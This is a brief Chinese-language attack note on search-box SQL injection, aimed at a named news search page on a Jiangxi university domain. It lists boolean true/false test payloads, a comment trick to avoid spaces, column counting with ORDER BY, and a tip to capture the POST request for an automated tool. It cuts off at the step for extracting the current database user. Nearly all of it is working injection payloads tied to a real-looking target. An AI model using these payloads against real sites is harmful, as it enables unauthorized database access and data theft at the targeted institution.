1判断: 关键字%’ and 1=1 and ‘%’=’ 返回正常
关键字%’ and 1=2 and ‘%’=’ 返回错误
%%%' and 1=1# 代替空格法
2找出keyword
post方式得抓抱:(变量放在最后面,就可以直接放工具跑)
http://zhaojiu.jxau.edu.cn/Web_News/Search.asp?style=3&keyWord=江西
爆字段数: 冬%’ order by 1-- and ‘%’=’ 或: 冬%’ order by 1 and ‘%’=’
3构造sql注入:
爆当前数据库用户名: /Web_News/Search.asp?style=3&keyWord=
